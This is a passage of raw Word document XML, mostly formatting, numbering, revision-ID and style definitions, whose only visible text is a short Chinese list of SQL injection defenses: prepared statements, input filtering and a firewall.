      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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sql注入的防范方法有哪些？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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预编译</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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对用户的输入进行过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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设置防火墙</w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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var(--monospace)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65A83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04265A83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">
    <w:nsid w:val="11E061DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11E061DA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288B292E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="288B292E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">
    <w:nsid w:val="5FEB18A8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5FEB18A8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90D07"/>
    <w:rsid w:val="00001C5C"/>
    <w:rsid w:val="00002F0E"/>
    <w:rsid w:val="00011C8B"/>
    <w:rsid w:val="000126CF"/>
    <w:rsid w:val="00012716"/>
    <w:rsid w:val="00013D3C"/>
    <w:rsid w:val="00017943"/>
    <w:rsid w:val="00020BA1"/>
    <w:rsid w:val="000253AE"/>
    <w:rsid w:val="000267D3"/>
    <w:rsid w:val="00027675"/>
    <w:rsid w:val="00033086"/>
    <w:rsid w:val="000368A4"/>
    <w:rsid w:val="00044710"/>
    <w:rsid w:val="00055677"/>
    <w:rsid w:val="00064FA0"/>
    <w:rsid w:val="0007020A"/>
    <w:rsid w:val="0007198B"/>
    <w:rsid w:val="000762B5"/>
    <w:rsid w:val="0007757E"/>
    <w:rsid w:val="000829A5"/>
    <w:rsid w:val="00093618"/>
    <w:rsid w:val="00093DE8"/>
    <w:rsid w:val="000A74C3"/>
    <w:rsid w:val="000B0168"/>
    <w:rsid w:val="000B12D4"/>
    <w:rsid w:val="000B2859"/>
    <w:rsid w:val="000B2F5D"/>
    <w:rsid w:val="000B4D29"/>
    <w:rsid w:val="000B6316"/>
    <w:rsid w:val="000C445D"/>
    <w:rsid w:val="000D2709"/>
    <w:rsid w:val="00105B54"/>
    <w:rsid w:val="00106518"/>
    <w:rsid w:val="001128BB"/>
    <w:rsid w:val="0011459D"/>
    <w:rsid w:val="00115E2F"/>
    <w:rsid w:val="0012399B"/>
    <w:rsid w:val="001246E1"/>
    <w:rsid w:val="00124A1C"/>
    <w:rsid w:val="00126824"/>
    <w:rsid w:val="00130BC7"/>
    <w:rsid w:val="00161D37"/>
    <w:rsid w:val="00166614"/>
    <w:rsid w:val="001677B7"/>
    <w:rsid w:val="001730B0"/>
    <w:rsid w:val="00174DE7"/>
    <w:rsid w:val="001817CC"/>
    <w:rsid w:val="00184156"/>
    <w:rsid w:val="00187CB0"/>
    <w:rsid w:val="001904EA"/>
    <w:rsid w:val="001A4619"/>
    <w:rsid w:val="001B7D53"/>
    <w:rsid w:val="001C032A"/>
    <w:rsid w:val="001D161E"/>
    <w:rsid w:val="001D6003"/>
    <w:rsid w:val="001D6F86"/>
    <w:rsid w:val="001D7CDA"/>
    <w:rsid w:val="001E29B6"/>
    <w:rsid w:val="001E65B3"/>
    <w:rsid w:val="001F784A"/>
    <w:rsid w:val="002123BA"/>
    <w:rsid w:val="00215694"/>
    <w:rsid w:val="0022266A"/>
    <w:rsid w:val="00226E9E"/>
    <w:rsid w:val="00227F06"/>
    <w:rsid w:val="00231B26"/>
    <w:rsid w:val="00240A18"/>
    <w:rsid w:val="00240C92"/>
    <w:rsid w:val="00242022"/>
    <w:rsid w:val="00252D75"/>
    <w:rsid w:val="00257905"/>
    <w:rsid w:val="00260D35"/>
    <w:rsid w:val="00272A7F"/>
    <w:rsid w:val="00273103"/>
    <w:rsid w:val="00280625"/>
    <w:rsid w:val="00285B8C"/>
    <w:rsid w:val="002946AC"/>
    <w:rsid w:val="00295D71"/>
    <w:rsid w:val="002A5EB9"/>
    <w:rsid w:val="002B0188"/>
    <w:rsid w:val="002B02CC"/>
    <w:rsid w:val="002B7828"/>
    <w:rsid w:val="002C4CD0"/>
    <w:rsid w:val="002E4334"/>
    <w:rsid w:val="002F03BD"/>
    <w:rsid w:val="002F35A6"/>
    <w:rsid w:val="002F59D2"/>
    <w:rsid w:val="00311C72"/>
    <w:rsid w:val="00311EB1"/>
    <w:rsid w:val="0032109C"/>
    <w:rsid w:val="00330519"/>
    <w:rsid w:val="00337CFF"/>
    <w:rsid w:val="00341F1F"/>
    <w:rsid w:val="00344756"/>
    <w:rsid w:val="00350C30"/>
    <w:rsid w:val="0036145B"/>
    <w:rsid w:val="00364335"/>
    <w:rsid w:val="00365A8E"/>
    <w:rsid w:val="0036738E"/>
    <w:rsid w:val="00371EA3"/>
    <w:rsid w:val="0037202F"/>
    <w:rsid w:val="00372D84"/>
    <w:rsid w:val="0038093A"/>
    <w:rsid w:val="0038155F"/>
    <w:rsid w:val="003A0890"/>
    <w:rsid w:val="003A67EB"/>
    <w:rsid w:val="003B2AF3"/>
    <w:rsid w:val="003C5515"/>
    <w:rsid w:val="003F1D58"/>
    <w:rsid w:val="00402D71"/>
    <w:rsid w:val="004059C1"/>
    <w:rsid w:val="00413E82"/>
    <w:rsid w:val="00415E07"/>
    <w:rsid w:val="00426445"/>
    <w:rsid w:val="0044445F"/>
    <w:rsid w:val="00453F16"/>
    <w:rsid w:val="004541CF"/>
    <w:rsid w:val="0046255E"/>
    <w:rsid w:val="00465F5D"/>
    <w:rsid w:val="004661A3"/>
    <w:rsid w:val="004721F0"/>
    <w:rsid w:val="00476F7F"/>
    <w:rsid w:val="00484BC9"/>
    <w:rsid w:val="0048691B"/>
    <w:rsid w:val="00493C33"/>
    <w:rsid w:val="00496911"/>
    <w:rsid w:val="00497859"/>
    <w:rsid w:val="004A0C20"/>
    <w:rsid w:val="004A46E8"/>
    <w:rsid w:val="004A5FAC"/>
    <w:rsid w:val="004A64F3"/>
    <w:rsid w:val="004D2CA4"/>
    <w:rsid w:val="004E0320"/>
    <w:rsid w:val="004E0FEE"/>
    <w:rsid w:val="004E29B3"/>
    <w:rsid w:val="004F0F56"/>
    <w:rsid w:val="004F2A79"/>
    <w:rsid w:val="004F6C89"/>
    <w:rsid w:val="0050469C"/>
    <w:rsid w:val="00504CA1"/>
    <w:rsid w:val="00504DD9"/>
    <w:rsid w:val="00507EA6"/>
    <w:rsid w:val="00522F19"/>
    <w:rsid w:val="00525086"/>
    <w:rsid w:val="005302CB"/>
    <w:rsid w:val="005349C0"/>
    <w:rsid w:val="005603E4"/>
    <w:rsid w:val="00581539"/>
    <w:rsid w:val="005844AB"/>
    <w:rsid w:val="00590D07"/>
    <w:rsid w:val="005A23B6"/>
    <w:rsid w:val="005B6690"/>
    <w:rsid w:val="005C43FF"/>
    <w:rsid w:val="005C441A"/>
    <w:rsid w:val="005C6E44"/>
    <w:rsid w:val="005D2F3F"/>
    <w:rsid w:val="005E3EE8"/>
    <w:rsid w:val="005F51C3"/>
    <w:rsid w:val="00614E1B"/>
    <w:rsid w:val="006229B5"/>
    <w:rsid w:val="006271E9"/>
    <w:rsid w:val="00635011"/>
    <w:rsid w:val="00640C09"/>
    <w:rsid w:val="006418CB"/>
    <w:rsid w:val="006474F9"/>
    <w:rsid w:val="00651BC6"/>
    <w:rsid w:val="00661ECA"/>
    <w:rsid w:val="006660E3"/>
    <w:rsid w:val="00672ECF"/>
    <w:rsid w:val="006734A9"/>
    <w:rsid w:val="0067431A"/>
    <w:rsid w:val="00676A1E"/>
    <w:rsid w:val="00677D6F"/>
    <w:rsid w:val="0068640F"/>
    <w:rsid w:val="00686CFC"/>
    <w:rsid w:val="006877C7"/>
    <w:rsid w:val="006A0733"/>
    <w:rsid w:val="006B2599"/>
    <w:rsid w:val="006C307F"/>
    <w:rsid w:val="006D091E"/>
    <w:rsid w:val="006E0EEF"/>
    <w:rsid w:val="006E18C2"/>
    <w:rsid w:val="006E7B15"/>
    <w:rsid w:val="006F7A49"/>
    <w:rsid w:val="00713499"/>
    <w:rsid w:val="00715199"/>
    <w:rsid w:val="00722612"/>
    <w:rsid w:val="007235D1"/>
    <w:rsid w:val="00724B65"/>
    <w:rsid w:val="00727E90"/>
    <w:rsid w:val="00734145"/>
    <w:rsid w:val="00735D0D"/>
    <w:rsid w:val="00744D0B"/>
    <w:rsid w:val="00750C62"/>
    <w:rsid w:val="007577F4"/>
    <w:rsid w:val="007615AC"/>
    <w:rsid w:val="00766B3E"/>
    <w:rsid w:val="00767723"/>
    <w:rsid w:val="0077793D"/>
    <w:rsid w:val="00784D58"/>
    <w:rsid w:val="00793E11"/>
    <w:rsid w:val="007958D9"/>
    <w:rsid w:val="007A1EDE"/>
    <w:rsid w:val="007A7EA6"/>
    <w:rsid w:val="007B3BF1"/>
    <w:rsid w:val="007E3DBD"/>
    <w:rsid w:val="007E5E31"/>
    <w:rsid w:val="007F61EA"/>
    <w:rsid w:val="007F740C"/>
    <w:rsid w:val="00802FED"/>
    <w:rsid w:val="008062EA"/>
    <w:rsid w:val="00811045"/>
    <w:rsid w:val="008116C2"/>
    <w:rsid w:val="00822B36"/>
    <w:rsid w:val="00824B04"/>
    <w:rsid w:val="00826606"/>
    <w:rsid w:val="00833CDD"/>
    <w:rsid w:val="0084601D"/>
    <w:rsid w:val="008475F5"/>
    <w:rsid w:val="00850087"/>
    <w:rsid w:val="00870701"/>
    <w:rsid w:val="008811E1"/>
    <w:rsid w:val="00893A80"/>
    <w:rsid w:val="008965B5"/>
    <w:rsid w:val="00897AC8"/>
    <w:rsid w:val="008A06E0"/>
    <w:rsid w:val="008A0ED2"/>
    <w:rsid w:val="008A5850"/>
    <w:rsid w:val="008B1FC9"/>
    <w:rsid w:val="008B26E6"/>
    <w:rsid w:val="008C2ABB"/>
    <w:rsid w:val="008D0A98"/>
    <w:rsid w:val="008D15E8"/>
    <w:rsid w:val="008D34FF"/>
    <w:rsid w:val="008D6863"/>
    <w:rsid w:val="008F4288"/>
    <w:rsid w:val="0090024E"/>
    <w:rsid w:val="00914142"/>
    <w:rsid w:val="00916D82"/>
    <w:rsid w:val="00935B53"/>
    <w:rsid w:val="00940DA6"/>
    <w:rsid w:val="00946908"/>
    <w:rsid w:val="00950ACA"/>
    <w:rsid w:val="00957B7F"/>
    <w:rsid w:val="0098045C"/>
    <w:rsid w:val="00980F9A"/>
    <w:rsid w:val="0098216B"/>
    <w:rsid w:val="00985FB1"/>
    <w:rsid w:val="00991278"/>
    <w:rsid w:val="00991568"/>
    <w:rsid w:val="00992A4C"/>
    <w:rsid w:val="00997505"/>
    <w:rsid w:val="009A4353"/>
    <w:rsid w:val="009B0BC7"/>
    <w:rsid w:val="009B39BD"/>
    <w:rsid w:val="009B6A42"/>
    <w:rsid w:val="009B7F69"/>
    <w:rsid w:val="009C1F87"/>
    <w:rsid w:val="009D26BF"/>
    <w:rsid w:val="009D2D37"/>
    <w:rsid w:val="009D7B2C"/>
    <w:rsid w:val="009E1081"/>
    <w:rsid w:val="009E414D"/>
    <w:rsid w:val="009E7993"/>
    <w:rsid w:val="009F731F"/>
    <w:rsid w:val="00A23E00"/>
    <w:rsid w:val="00A243F4"/>
    <w:rsid w:val="00A24C38"/>
    <w:rsid w:val="00A26E4D"/>
    <w:rsid w:val="00A30C51"/>
    <w:rsid w:val="00A342E5"/>
    <w:rsid w:val="00A516CB"/>
    <w:rsid w:val="00A61B93"/>
    <w:rsid w:val="00A6666F"/>
    <w:rsid w:val="00A84B03"/>
    <w:rsid w:val="00A859E9"/>
    <w:rsid w:val="00A87E38"/>
    <w:rsid w:val="00A947B0"/>
    <w:rsid w:val="00AA00B8"/>
    <w:rsid w:val="00AA14E1"/>
    <w:rsid w:val="00AA639E"/>
    <w:rsid w:val="00AB4281"/>
    <w:rsid w:val="00AB51C3"/>
    <w:rsid w:val="00AB5AB2"/>
    <w:rsid w:val="00AF229C"/>
    <w:rsid w:val="00B05021"/>
    <w:rsid w:val="00B06FEF"/>
    <w:rsid w:val="00B16DAB"/>
    <w:rsid w:val="00B17932"/>
    <w:rsid w:val="00B22DDD"/>
    <w:rsid w:val="00B3716F"/>
    <w:rsid w:val="00B40743"/>
    <w:rsid w:val="00B6359E"/>
    <w:rsid w:val="00B6579B"/>
    <w:rsid w:val="00B6650D"/>
    <w:rsid w:val="00B67FE9"/>
    <w:rsid w:val="00B7478B"/>
    <w:rsid w:val="00B76AA0"/>
    <w:rsid w:val="00B8078D"/>
    <w:rsid w:val="00B81AB6"/>
    <w:rsid w:val="00B86B75"/>
    <w:rsid w:val="00B94C84"/>
    <w:rsid w:val="00BA3298"/>
    <w:rsid w:val="00BA6256"/>
    <w:rsid w:val="00BB52F0"/>
    <w:rsid w:val="00BC48D5"/>
    <w:rsid w:val="00BC5C16"/>
    <w:rsid w:val="00BD24BC"/>
    <w:rsid w:val="00BD4E39"/>
    <w:rsid w:val="00BE2D10"/>
    <w:rsid w:val="00C0011F"/>
    <w:rsid w:val="00C014DB"/>
    <w:rsid w:val="00C1768E"/>
    <w:rsid w:val="00C236B9"/>
    <w:rsid w:val="00C2394E"/>
    <w:rsid w:val="00C30D8E"/>
    <w:rsid w:val="00C324E6"/>
    <w:rsid w:val="00C36279"/>
    <w:rsid w:val="00C433D0"/>
    <w:rsid w:val="00C54321"/>
    <w:rsid w:val="00C55668"/>
    <w:rsid w:val="00C60671"/>
    <w:rsid w:val="00C624E1"/>
    <w:rsid w:val="00C629AF"/>
    <w:rsid w:val="00C66A3F"/>
    <w:rsid w:val="00C7286B"/>
    <w:rsid w:val="00C755E1"/>
    <w:rsid w:val="00C75C72"/>
    <w:rsid w:val="00C808CE"/>
    <w:rsid w:val="00C90C85"/>
    <w:rsid w:val="00C93CA3"/>
    <w:rsid w:val="00C96902"/>
    <w:rsid w:val="00C977FD"/>
    <w:rsid w:val="00CA1F0F"/>
    <w:rsid w:val="00CA3A0C"/>
    <w:rsid w:val="00CA49C1"/>
    <w:rsid w:val="00CC1802"/>
    <w:rsid w:val="00CC1DB1"/>
    <w:rsid w:val="00CC4CDB"/>
    <w:rsid w:val="00CC7E15"/>
    <w:rsid w:val="00CD1FD0"/>
    <w:rsid w:val="00CD69A6"/>
    <w:rsid w:val="00CD69CB"/>
    <w:rsid w:val="00CE1C2C"/>
    <w:rsid w:val="00CE57EB"/>
    <w:rsid w:val="00D01510"/>
    <w:rsid w:val="00D345DD"/>
    <w:rsid w:val="00D53EDD"/>
    <w:rsid w:val="00D557EC"/>
    <w:rsid w:val="00D5633B"/>
    <w:rsid w:val="00D6179C"/>
    <w:rsid w:val="00D6287D"/>
    <w:rsid w:val="00D64C70"/>
    <w:rsid w:val="00D6639E"/>
    <w:rsid w:val="00D66DFE"/>
    <w:rsid w:val="00D769D6"/>
    <w:rsid w:val="00D77DBA"/>
    <w:rsid w:val="00D8467C"/>
    <w:rsid w:val="00D86C63"/>
    <w:rsid w:val="00D954E8"/>
    <w:rsid w:val="00D965A0"/>
    <w:rsid w:val="00DA2427"/>
    <w:rsid w:val="00DA2CE0"/>
    <w:rsid w:val="00DA52BE"/>
    <w:rsid w:val="00DB10C1"/>
    <w:rsid w:val="00DB2179"/>
    <w:rsid w:val="00DC277C"/>
    <w:rsid w:val="00DD0492"/>
    <w:rsid w:val="00DD0CED"/>
    <w:rsid w:val="00DD2653"/>
    <w:rsid w:val="00DD35D3"/>
    <w:rsid w:val="00DD4117"/>
    <w:rsid w:val="00DF2F7B"/>
    <w:rsid w:val="00DF563D"/>
    <w:rsid w:val="00E00A73"/>
    <w:rsid w:val="00E103BF"/>
    <w:rsid w:val="00E170E4"/>
    <w:rsid w:val="00E23BFA"/>
    <w:rsid w:val="00E26718"/>
    <w:rsid w:val="00E315A3"/>
    <w:rsid w:val="00E32B33"/>
    <w:rsid w:val="00E34782"/>
    <w:rsid w:val="00E45A3D"/>
    <w:rsid w:val="00E537FE"/>
    <w:rsid w:val="00E54773"/>
    <w:rsid w:val="00E75ADC"/>
    <w:rsid w:val="00E75C86"/>
    <w:rsid w:val="00E778E9"/>
    <w:rsid w:val="00E87ABD"/>
    <w:rsid w:val="00E90CD0"/>
    <w:rsid w:val="00EA322C"/>
    <w:rsid w:val="00EB50BE"/>
    <w:rsid w:val="00EB5D6B"/>
    <w:rsid w:val="00EC000E"/>
    <w:rsid w:val="00EC221E"/>
    <w:rsid w:val="00EC7D6D"/>
    <w:rsid w:val="00ED545D"/>
    <w:rsid w:val="00ED6828"/>
    <w:rsid w:val="00ED72B6"/>
    <w:rsid w:val="00EE2CEF"/>
    <w:rsid w:val="00F019E5"/>
    <w:rsid w:val="00F01C62"/>
    <w:rsid w:val="00F10F89"/>
    <w:rsid w:val="00F167F1"/>
    <w:rsid w:val="00F17868"/>
    <w:rsid w:val="00F20DB3"/>
    <w:rsid w:val="00F21B72"/>
    <w:rsid w:val="00F21E8C"/>
    <w:rsid w:val="00F236FD"/>
    <w:rsid w:val="00F3225D"/>
    <w:rsid w:val="00F3346D"/>
    <w:rsid w:val="00F45ABC"/>
    <w:rsid w:val="00F50E4B"/>
    <w:rsid w:val="00F527F1"/>
    <w:rsid w:val="00F52952"/>
    <w:rsid w:val="00F61785"/>
    <w:rsid w:val="00F65B1B"/>
    <w:rsid w:val="00F76FE6"/>
    <w:rsid w:val="00F772CF"/>
    <w:rsid w:val="00F90F7C"/>
    <w:rsid w:val="00F94BC0"/>
    <w:rsid w:val="00FA2725"/>
    <w:rsid w:val="00FA64CF"/>
    <w:rsid w:val="00FB6EE7"/>
    <w:rsid w:val="00FD0733"/>
    <w:rsid w:val="00FD23DE"/>
    <w:rsid w:val="00FD281E"/>
    <w:rsid w:val="00FE2251"/>
    <w:rsid w:val="00FF0F13"/>
    <w:rsid w:val="00FF389F"/>
    <w:rsid w:val="00FF417A"/>
    <w:rsid w:val="00FF580D"/>
    <w:rsid w:val="00FF5A82"/>
    <w:rsid w:val="571ACFF9"/>
    <w:rsid w:val="6FD566A3"/>
    <w:rsid w:val="6FF779F7"/>
    <w:rsid w:val="6FFB9CF0"/>
    <w:rsid w:val="77F736C7"/>
    <w:rsid w:val="7DF79FFF"/>
    <w:rsid w:val="7FE89B1F"/>
    <w:rsid w:val="81FA5E43"/>
    <w:rsid w:val="B3690A46"/>
    <w:rsid w:val="B67EBCA4"/>
    <w:rsid w:val="BBB695CC"/>
    <w:rsid w:val="BDD963A3"/>
    <w:rsid w:val="BECE678A"/>
    <w:rsid w:val="BFBF8630"/>
    <w:rsid w:val="DFACA2A4"/>
    <w:rsid w:val="EABD2B05"/>
    <w:rsid w:val="F0BF7970"/>
    <w:rsid w:val="F1F6C4B5"/>
    <w:rsid w:val="FBF5E179"/>
    <w:rsid w:val="FFDF7C21"/>
    <w:rsid w:val="FFFD0ED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iPriority="9" w:semiHidden="0" w:name="footnote text"/>
    <w:lsdException w:uiPriority="0" w:name="annotation text"/>
    <w:lsdException w:uiPriority="0" w:semiHidden="0" w:name="header"/>
    <w:lsdException w:qFormat="1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qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden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nhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List 5"/>
    <w:lsdException w:uiPriority="0" w:name="List Bullet 2"/>
    <w:lsdException w:uiPriority="0" w:name="List Bullet 3"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Bullet 4"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden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qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Date"/>
    <w:lsdException w:uiPriority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iPriority="0" w:name="Body Text Indent 2"/>
    <w:lsdException w:uiPriority="0" w:name="Body Text Indent 3"/>
    <w:lsdException w:qFormat="1" w:uiPriority="9" w:semiHidden="0" w:name="Block Text"/>
    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Hyperlink"/>
    <w:lsdException w:uiPriority="0" w:name="FollowedHyperlink"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Strong"/>
    <w:lsdException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EastAsia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link w:val="76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35B8A" w:themeColor="accent1" w:themeShade="B5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5">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="3"/>
    <w:link w:val="78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/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1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</w:rPr>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="21">
    <w:name w:val="Default Paragraph Font"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="2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79"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="180" w:after="180"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="caption"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="23"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing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EastAsia" w:cstheme="minorBidi"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="15">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="74"/>
    <w:unhideWhenUsed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6">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="73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Subtitle"/>
    <w:basedOn w:val="18"/>
    <w:next w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="18">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="3"/>
    <w:link w:val="75"/>
    <w:qFormat/>
    <w:uiPriority w:val="1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9">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="22">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="23"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="题注 字符"/>
    <w:basedOn w:val="21"/>
    <w:link w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="24">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="23"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="26">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="25"/>
    <w:qFormat/>
    <w:uiPriority w:val="0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7">
    <w:name w:val="First Paragraph"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="28">
    <w:name w:val="Compact"/>
    <w:basedOn w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="29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EastAsia" w:cstheme="minorBidi"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="30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31">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="32">
    <w:name w:val="Table"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3">
    <w:name w:val="Definition Term"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="34"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="34">
    <w:name w:val="Definition"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="35">
    <w:name w:val="Table Caption"/>
    <w:basedOn w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="36">
    <w:name w:val="Image Caption"/>
    <w:basedOn w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="37">
    <w:name w:val="Figure"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="38">
    <w:name w:val="Captioned Figure"/>
    <w:basedOn w:val="37"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="39">
    <w:name w:val="Verbatim Char"/>
    <w:basedOn w:val="23"/>
    <w:link w:val="40"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="40">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="41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b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:val="366091" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="42">
    <w:name w:val="KeywordTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:color w:val="007020"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="43">
    <w:name w:val="DataTypeTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="902000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="44">
    <w:name w:val="DecValTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="40A070"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="45">
    <w:name w:val="BaseNTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="40A070"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="46">
    <w:name w:val="FloatTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="40A070"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="47">
